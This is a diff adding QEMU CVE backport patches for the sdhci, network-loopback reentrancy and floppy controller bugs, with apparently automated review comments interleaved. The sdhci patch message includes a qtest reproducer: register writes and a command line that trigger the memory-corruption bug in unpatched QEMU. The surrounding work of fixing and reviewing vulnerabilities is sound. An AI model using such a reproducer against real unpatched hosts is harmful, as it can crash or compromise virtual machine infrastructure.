+previous one, reset the data pointer of s->fifo_buffer[] so that
+s->fifo_buffer[] can be filled in using the new block size in
+the next transfer.
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001010
+outl 0xcfc 0xe0000000
+outl 0xcf8 0x80001001
+outl 0xcfc 0x06000000
+write 0xe000002c 0x1 0x05
+write 0xe0000005 0x1 0x02
+write 0xe0000007 0x1 0x01
+write 0xe0000028 0x1 0x10
+write 0x0 0x1 0x23
+write 0x2 0x1 0x08
+write 0xe000000c 0x1 0x01
+write 0xe000000e 0x1 0x20
+write 0xe000000f 0x1 0x00
+write 0xe000000c 0x1 0x32
+write 0xe0000004 0x2 0x0200
+write 0xe0000028 0x1 0x00
+write 0xe0000003 0x1 0x40
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+ -nodefaults -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-6-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-5.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/cffb446e8fd19a14e1634c7a3a8b07be3f01d5c9 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1135,6 +1135,8 @@ sdhci_write(void *opaque, hwaddr offset,
+ break;
+ case SDHC_BLKSIZE:
+ if (!TRANSFERRING_DATA(s->prnsts)) {
++ uint16_t blksize = s->blksize;
++
+ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+ MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+
+@@ -1146,6 +1148,16 @@ sdhci_write(void *opaque, hwaddr offset,
+
+ s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
+ }
++
++ /*
++ * If the block size is programmed to a different value from
++ * the previous one, reset the data pointer of s->fifo_buffer[]
++ * so that s->fifo_buffer[] can be filled in using the new block
++ * size in the next transfer.
++ */
++ if (blksize != s->blksize) {
++ s->data_count = 0;
++ }
+ }
+
+ break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch
new file mode 100644
index 0000000000..5bacd67481
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch
@@ -0,0 +1,177 @@
+From 4b1988a29d67277d6c8ce1df52975f5616592913 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 11:44:36 +0800
+Subject: [PATCH 01/10] net: introduce qemu_receive_packet()
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Some NIC supports loopback mode and this is done by calling
+nc->info->receive() directly which in fact suppresses the effort of
+reentrancy check that is done in qemu_net_queue_send().
+
+Unfortunately we can't use qemu_net_queue_send() here since for
+loopback there's no sender as peer, so this patch introduce a
+qemu_receive_packet() which is used for implementing loopback mode
+for a NIC with this check.
+
+NIC that supports loopback mode will be converted to this helper.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [705df5466c98f3efdd2b68d3b31dad86858acad7]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ include/net/net.h | 5 +++++
+ include/net/queue.h | 8 ++++++++
+ net/net.c | 38 +++++++++++++++++++++++++++++++-------
+ net/queue.c | 22 ++++++++++++++++++++++
+ 4 files changed, 66 insertions(+), 7 deletions(-)
+
+diff --git a/include/net/net.h b/include/net/net.h
+index 778fc787c..03f058ecb 100644
+--- a/include/net/net.h
++++ b/include/net/net.h
+@@ -143,12 +143,17 @@ void *qemu_get_nic_opaque(NetClientState *nc);
+ void qemu_del_net_client(NetClientState *nc);
+ typedef void (*qemu_nic_foreach)(NICState *nic, void *opaque);
+ void qemu_foreach_nic(qemu_nic_foreach func, void *opaque);
++int qemu_can_receive_packet(NetClientState *nc);
+ int qemu_can_send_packet(NetClientState *nc);
+ ssize_t qemu_sendv_packet(NetClientState *nc, const struct iovec *iov,
+ int iovcnt);
+ ssize_t qemu_sendv_packet_async(NetClientState *nc, const struct iovec *iov,
+ int iovcnt, NetPacketSent *sent_cb);
+ ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size);
++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size);
++ssize_t qemu_receive_packet_iov(NetClientState *nc,
++ const struct iovec *iov,
++ int iovcnt);
+ ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size);
+ ssize_t qemu_send_packet_async(NetClientState *nc, const uint8_t *buf,
+ int size, NetPacketSent *sent_cb);
+diff --git a/include/net/queue.h b/include/net/queue.h
+index c0269bb1d..9f2f289d7 100644
+--- a/include/net/queue.h
++++ b/include/net/queue.h
+@@ -55,6 +55,14 @@ void qemu_net_queue_append_iov(NetQueue *queue,
+
+ void qemu_del_net_queue(NetQueue *queue);
+
++ssize_t qemu_net_queue_receive(NetQueue *queue,
++ const uint8_t *data,
++ size_t size);
++
++ssize_t qemu_net_queue_receive_iov(NetQueue *queue,
++ const struct iovec *iov,
++ int iovcnt);
++
+ ssize_t qemu_net_queue_send(NetQueue *queue,
+ NetClientState *sender,
+ unsigned flags,
+diff --git a/net/net.c b/net/net.c
+index 6a2c3d956..5e15e5d27 100644
+--- a/net/net.c
++++ b/net/net.c
+@@ -528,6 +528,17 @@ int qemu_set_vnet_be(NetClientState *nc, bool is_be)
+ #endif
+ }
+
++int qemu_can_receive_packet(NetClientState *nc)
++{
++ if (nc->receive_disabled) {
++ return 0;
++ } else if (nc->info->can_receive &&
++ !nc->info->can_receive(nc)) {
++ return 0;
++ }
++ return 1;
++}
++
+ int qemu_can_send_packet(NetClientState *sender)
+ {
+ int vm_running = runstate_is_running();
+@@ -540,13 +551,7 @@ int qemu_can_send_packet(NetClientState *sender)
+ return 1;
+ }
+
+- if (sender->peer->receive_disabled) {
+- return 0;
+- } else if (sender->peer->info->can_receive &&
+- !sender->peer->info->can_receive(sender->peer)) {
+- return 0;
+- }
+- return 1;
++ return qemu_can_receive_packet(sender->peer);
+ }
+
+ static ssize_t filter_receive_iov(NetClientState *nc,
+@@ -679,6 +684,25 @@ ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size)
+ return qemu_send_packet_async(nc, buf, size, NULL);
+ }
+
++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size)
++{
++ if (!qemu_can_receive_packet(nc)) {
++ return 0;
++ }
++
++ return qemu_net_queue_receive(nc->incoming_queue, buf, size);
++}
++
++ssize_t qemu_receive_packet_iov(NetClientState *nc, const struct iovec *iov,
++ int iovcnt)
++{
++ if (!qemu_can_receive_packet(nc)) {
++ return 0;
++ }
++
++ return qemu_net_queue_receive_iov(nc->incoming_queue, iov, iovcnt);
++}
++
+ ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size)
+ {
+ return qemu_send_packet_async_with_flags(nc, QEMU_NET_PACKET_FLAG_RAW,
+diff --git a/net/queue.c b/net/queue.c
+index 19e32c80f..c872d51df 100644
+--- a/net/queue.c
++++ b/net/queue.c
+@@ -182,6 +182,28 @@ static ssize_t qemu_net_queue_deliver_iov(NetQueue *queue,
+ return ret;
+ }
+
++ssize_t qemu_net_queue_receive(NetQueue *queue,
++ const uint8_t *data,
++ size_t size)
++{
++ if (queue->delivering) {
++ return 0;
++ }
++
++ return qemu_net_queue_deliver(queue, NULL, 0, data, size);
++}
++
++ssize_t qemu_net_queue_receive_iov(NetQueue *queue,
++ const struct iovec *iov,
++ int iovcnt)
++{
++ if (queue->delivering) {
++ return 0;
++ }
++
++ return qemu_net_queue_deliver_iov(queue, NULL, 0, iov, iovcnt);
++}
++
+ ssize_t qemu_net_queue_send(NetQueue *queue,
+ NetClientState *sender,
+ unsigned flags,
+--
+2.29.2
+
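Review bot: The new `qemu_net_queue_receive()` and `qemu_net_queue_receive_iov()` in net/queue.c return 0 when `queue->delivering` is set, and `qemu_receive_packet()` returns the same 0 when `qemu_can_receive_packet()` fails, but no comment on the prototypes says that a 0 return means the loopback frame was dropped rather than queued. A comment in include/net/queue.h would make that contract explicit for the NIC models converted later in the series, for example `/* Loopback delivery with no sender; returns 0 and drops the packet if the queue is already delivering (reentrancy guard). */`. `qemu_receive_packet()` also passes its `int size` straight into the `size_t size` parameter, so a negative length would arrive as a very large one; whether any caller can produce that is not visible here.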
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch
new file mode 100644
index 0000000000..fdb4894e44
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch
@@ -0,0 +1,41 @@
+From 65b851efd3d0280425c202f4e5880c48f8334dae Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 14:35:30 -0500
+Subject: [PATCH 10/10] lan9118: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [37cee01784ff0df13e5209517e1b3594a5e792d1]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/lan9118.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/lan9118.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/lan9118.c
++++ qemu-4.2.0/hw/net/lan9118.c
+@@ -667,7 +667,7 @@ static void do_tx_packet(lan9118_state *
+ /* FIXME: Honor TX disable, and allow queueing of packets. */
+ if (s->phy_control & 0x4000) {
+ /* This assumes the receive routine doesn't touch the VLANClient. */
+- lan9118_receive(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
++ qemu_receive_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
+ } else {
+ qemu_send_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
+ }
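Review bot: The `Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com` trailer in this patch header is missing its closing `>`, and the same truncated trailer appears in CVE-2021-3416_3.patch, CVE-2021-3416_7.patch and CVE-2021-3416_8.patch. Tools that parse trailers for attribution may skip or misread the line, so it should read `Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>`, as it does in CVE-2021-3416_2.patch. The code change itself is a one-line swap inside `do_tx_packet`, whose body starts and ends outside the hunk.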
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch
new file mode 100644
index 0000000000..5e53e20bac
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch
@@ -0,0 +1,42 @@
+From e2a48a3c7cc33dbbe89f896e0f07462cb04ff6b5 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 12:13:22 +0800
+Subject: [PATCH 02/10] e1000: switch to use qemu_receive_packet() for loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [1caff0340f49c93d535c6558a5138d20d475315c]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/e1000.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/e1000.c b/hw/net/e1000.c
+index d7d05ae30..cf22c4f07 100644
+--- a/hw/net/e1000.c
++++ b/hw/net/e1000.c
+@@ -546,7 +546,7 @@ e1000_send_packet(E1000State *s, const uint8_t *buf, int size)
+
+ NetClientState *nc = qemu_get_queue(s->nic);
+ if (s->phy_reg[PHY_CTRL] & MII_CR_LOOPBACK) {
+- nc->info->receive(nc, buf, size);
++ qemu_receive_packet(nc, buf, size);
+ } else {
+ qemu_send_packet(nc, buf, size);
+ }
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch
new file mode 100644
index 0000000000..3fc469e3e3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch
@@ -0,0 +1,43 @@
+From c041a4da1ff119715e0ccf2d4a7af62568f17b93 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 12:57:40 +0800
+Subject: [PATCH 03/10] dp8393x: switch to use qemu_receive_packet() for
+ loopback packet
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [331d2ac9ea307c990dc86e6493e8f0c48d14bb33]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/dp8393x.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/dp8393x.c b/hw/net/dp8393x.c
+index 205c0decc..533a8304d 100644
+--- a/hw/net/dp8393x.c
++++ b/hw/net/dp8393x.c
+@@ -506,7 +506,7 @@ static void dp8393x_do_transmit_packets(dp8393xState *s)
+ s->regs[SONIC_TCR] |= SONIC_TCR_CRSL;
+ if (nc->info->can_receive(nc)) {
+ s->loopback_packet = 1;
+- nc->info->receive(nc, s->tx_buffer, tx_len);
++ qemu_receive_packet(nc, s->tx_buffer, tx_len);
+ }
+ } else {
+ /* Transmit packet */
+--
+2.29.2
+
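Review bot: In `dp8393x_do_transmit_packets` the loopback branch still sets `s->loopback_packet = 1` before `qemu_receive_packet()`, which can now return 0 without invoking the receive callback when the queue is already delivering. If that callback is what clears `loopback_packet` (not visible in this hunk), the flag would stay set after a dropped frame; checking the return value, e.g. `if (qemu_receive_packet(nc, s->tx_buffer, tx_len) == 0) { s->loopback_packet = 0; }`, or a comment explaining why this cannot happen, would close the gap. The outer `nc->info->can_receive(nc)` test is now repeated inside `qemu_receive_packet()`, and it is made without the NULL check that `qemu_can_receive_packet()` performs. The function body continues outside the hunk.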
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch
new file mode 100644
index 0000000000..93202ebcef
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch
@@ -0,0 +1,42 @@
+From d465dc79c9ee729d91ef086b993e956b1935be69 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:14:35 +0800
+Subject: [PATCH 05/10] sungem: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [8c92060d3c0248bd4d515719a35922cd2391b9b4]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/sungem.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/sungem.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/sungem.c
++++ qemu-4.2.0/hw/net/sungem.c
+@@ -305,7 +305,7 @@ static void sungem_send_packet(SunGEMSta
+ NetClientState *nc = qemu_get_queue(s->nic);
+
+ if (s->macregs[MAC_XIFCFG >> 2] & MAC_XIFCFG_LBCK) {
+- nc->info->receive(nc, buf, size);
++ qemu_receive_packet(nc, buf, size);
+ } else {
+ qemu_send_packet(nc, buf, size);
+ }
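Review bot: This file carries `[PATCH 05/10]` and directly follows CVE-2021-3416_3.patch (`[PATCH 03/10]`); no CVE-2021-3416_4.patch is added between them in this diff, so one patch of the upstream ten-part series is not part of the backport. If it was left out on purpose, presumably because the device it touches is not in qemu-4.2.0, the reason should be recorded so that CVE tracking does not treat the series as incomplete, for example with a line in the recipe or in this header such as `# CVE-2021-3416 patch 04/10 not applicable to qemu-4.2.0: <reason>`. The code change here is a one-line swap inside `sungem_send_packet`, which starts outside the hunk.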
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch
new file mode 100644
index 0000000000..40b4bd96e7
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch
@@ -0,0 +1,40 @@
+From c0010f9b2bafe866fe32e3c2688454bc24147136 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:27:52 +0800
+Subject: [PATCH 06/10] tx_pkt: switch to use qemu_receive_packet_iov() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_receive_iov() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [8c552542b81e56ff532dd27ec6e5328954bdda73]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/net_tx_pkt.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/net_tx_pkt.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/net_tx_pkt.c
++++ qemu-4.2.0/hw/net/net_tx_pkt.c
+@@ -544,7 +544,7 @@ static inline void net_tx_pkt_sendv(stru
+ NetClientState *nc, const struct iovec *iov, int iov_cnt)
+ {
+ if (pkt->is_loopback) {
+- nc->info->receive_iov(nc, iov, iov_cnt);
++ qemu_receive_packet_iov(nc, iov, iov_cnt);
+ } else {
+ qemu_sendv_packet(nc, iov, iov_cnt);
+ }
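Review bot: The patch description names `qemu_receive_receive_iov()`, a function that does not appear in the series; the code in `net_tx_pkt_sendv` calls `qemu_receive_packet_iov()`. The description should use the real name so that a search for the helper finds this patch.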
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch
new file mode 100644
index 0000000000..b3b702cca4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch
@@ -0,0 +1,42 @@
+From 64b38675c728354e4015e4bec3d975cd4cb8a981 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Fri, 26 Feb 2021 13:47:53 -0500
+Subject: [PATCH 07/10] rtl8139: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910826
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [5311fb805a4403bba024e83886fa0e7572265de4]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/rtl8139.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/rtl8139.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/rtl8139.c
++++ qemu-4.2.0/hw/net/rtl8139.c
+@@ -1793,7 +1793,7 @@ static void rtl8139_transfer_frame(RTL81
+ }
+
+ DPRINTF("+++ transmit loopback mode\n");
+- rtl8139_do_receive(qemu_get_queue(s->nic), buf, size, do_interrupt);
++ qemu_receive_packet(qemu_get_queue(s->nic), buf, size);
+
+ if (iov) {
+ g_free(buf2);
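Review bot: The replaced call `rtl8139_do_receive(qemu_get_queue(s->nic), buf, size, do_interrupt)` forwarded the caller's `do_interrupt` flag, while `qemu_receive_packet(qemu_get_queue(s->nic), buf, size)` has no such parameter, so loopback frames now get whatever interrupt behaviour the registered receive callback uses. That callback is outside the hunk, so it cannot be confirmed from here whether callers that passed `do_interrupt == 0` see a change. A short comment at the call site would record the decision, e.g. `/* loopback goes through the net queue for the reentrancy check; do_interrupt is not forwarded */`. `rtl8139_transfer_frame` starts and ends outside the hunk.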
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch
new file mode 100644
index 0000000000..ed716468dc
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch
@@ -0,0 +1,44 @@
+From 023ce62f0a788ad3a8233c7a828554bceeafd031 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 10:33:34 -0500
+Subject: [PATCH 08/10] pcnet: switch to use qemu_receive_packet() for loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1917085
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [99ccfaa1edafd79f7a3a0ff7b58ae4da7c514928]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/pcnet.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/pcnet.c b/hw/net/pcnet.c
+index f3f18d859..dcd3fc494 100644
+--- a/hw/net/pcnet.c
++++ b/hw/net/pcnet.c
+@@ -1250,7 +1250,7 @@ txagain:
+ if (BCR_SWSTYLE(s) == 1)
+ add_crc = !GET_FIELD(tmd.status, TMDS, NOFCS);
+ s->looptest = add_crc ? PCNET_LOOPTEST_CRC : PCNET_LOOPTEST_NOCRC;
+- pcnet_receive(qemu_get_queue(s->nic), s->buffer, s->xmit_pos);
++ qemu_receive_packet(qemu_get_queue(s->nic), s->buffer, s->xmit_pos);
+ s->looptest = 0;
+ } else {
+ if (s->nic) {
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch
new file mode 100644
index 0000000000..f4a985604e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch
@@ -0,0 +1,41 @@
+From ecf7e62bb2cb02c9bd40082504ae376f3e19ffd2 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 14:33:43 -0500
+Subject: [PATCH 09/10] cadence_gem: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [e73adfbeec9d4e008630c814759052ed945c3fed]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/cadence_gem.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+Index: qemu-4.2.0/hw/net/cadence_gem.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/cadence_gem.c
++++ qemu-4.2.0/hw/net/cadence_gem.c
+@@ -1225,7 +1225,7 @@ static void gem_transmit(CadenceGEMState
+ /* Send the packet somewhere */
+ if (s->phy_loop || (s->regs[GEM_NWCTRL] &
+ GEM_NWCTRL_LOCALLOOP)) {
+- gem_receive(qemu_get_queue(s->nic), tx_packet,
++ qemu_receive_packet(qemu_get_queue(s->nic), tx_packet,
+ total_bytes);
+ } else {
+ qemu_send_packet(qemu_get_queue(s->nic), tx_packet,
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch
new file mode 100644
index 0000000000..4ff3413f8e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch
@@ -0,0 +1,87 @@
+From defac5e2fbddf8423a354ff0454283a2115e1367 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@redhat.com>
+Date: Thu, 18 Nov 2021 12:57:32 +0100
+Subject: [PATCH] hw/block/fdc: Prevent end-of-track overrun (CVE-2021-3507)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Per the 82078 datasheet, if the end-of-track (EOT byte in
+the FIFO) is more than the number of sectors per side, the
+command is terminated unsuccessfully:
+
+* 5.2.5 DATA TRANSFER TERMINATION
+
+ The 82078 supports terminal count explicitly through
+ the TC pin and implicitly through the underrun/over-
+ run and end-of-track (EOT) functions. For full sector
+ transfers, the EOT parameter can define the last
+ sector to be transferred in a single or multisector
+ transfer. If the last sector to be transferred is a par-
+ tial sector, the host can stop transferring the data in
+ mid-sector, and the 82078 will continue to complete
+ the sector as if a hardware TC was received. The
+ only difference between these implicit functions and
+ TC is that they return "abnormal termination" result
+ status. Such status indications can be ignored if they
+ were expected.
+
+* 6.1.3 READ TRACK
+
+ This command terminates when the EOT specified
+ number of sectors have been read. If the 82078
+ does not find an I D Address Mark on the diskette
+ after the second· occurrence of a pulse on the
+ INDX# pin, then it sets the IC code in Status Regis-
+ ter 0 to "01" (Abnormal termination), sets the MA bit
+ in Status Register 1 to "1", and terminates the com-
+ mand.
+
+* 6.1.6 VERIFY
+
